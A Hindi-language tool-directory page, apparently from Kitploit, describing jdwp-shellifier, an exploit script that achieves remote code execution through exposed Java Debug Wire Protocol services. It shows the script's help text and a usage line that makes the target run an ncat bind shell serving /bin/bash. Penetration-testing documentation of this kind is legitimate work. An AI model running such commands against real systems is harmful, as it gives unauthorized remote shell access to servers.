Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
jdwp-shellifier — उजागर Java Debug Wire Protocol (JDWP) सेवाओं के लिए शोषण स्क्रिप्ट, जो पेंटेस्टर्स को Java कोड इंजेक्ट करने और लक्षित JVM पर मनमाने OS कमांड निष्पादित करने में सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/ioactive/jdwp-shellifier
शोषणडीबगर्सपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubioactive/jdwp-shellifier

jdwp-shellifier

उजागर Java Debug Wire Protocol (JDWP) सेवाओं के लिए शोषण स्क्रिप्ट, जो पेंटेस्टर्स को Java कोड इंजेक्ट करने और लक्षित JVM पर मनमाने OS कमांड निष्पादित करने में सक्षम बनाती है।

रिपॉजिटरी देखें
9172892 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

JDWP शोषण स्क्रिप्ट

यह क्या है ?

यह शोषण स्क्रिप्ट पेंटेस्टर्स द्वारा सक्रिय JDWP सेवा के विरुद्ध उपयोग करने के लिए है, ताकि रिमोट कोड निष्पादन प्राप्त किया जा सके।

यह कैसे काम करता है ?

खैर, काफी मानक तरीके से, स्क्रिप्ट को केवल Python 2 इंटरप्रेटर की आवश्यकता होती है:

root@kitploit:~
% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
                      [--cmd COMMAND]

Universal exploitation script for JDWP by @_hugsy_

optional arguments:
-h, --help            show this help message and exit
-t IP, --target IP    Remote target IP (default: None)
-p PORT, --port PORT  Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
	java.net.ServerSocket.accept)
	--cmd COMMAND         Specify full path to method to break on (default:
		None)

किसी विशिष्ट होस्ट/पोर्ट को लक्षित करने के लिए:

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234

यह कमांड केवल JVM पर Java कोड इंजेक्ट करेगा और ऑपरेटिंग सिस्टम, Java संस्करण जैसी कुछ जानकारी दिखाएगा। चूंकि यह बाहरी कोड/बाइनरी को निष्पादित नहीं करता है, यह पूरी तरह से सुरक्षित है और इसे प्रूफ-ऑफ-कॉन्सेप्ट के रूप में उपयोग किया जा सकता है।

root@kitploit:~
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"

यह कमांड वास्तव में चल रहे JVM को प्रदान किए गए अधिकारों के साथ निर्दिष्ट तर्क सहित ncat प्रक्रिया को निष्पादित करेगा।

प्रश्न भेजने से पहले, JDWP प्रोटोकॉल की पूरी समझ के लिए http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html को अवश्य पढ़ें।

धन्यवाद

  • Ilja Van Sprundel
  • Sebastien Macke
टूल डाउनलोड करें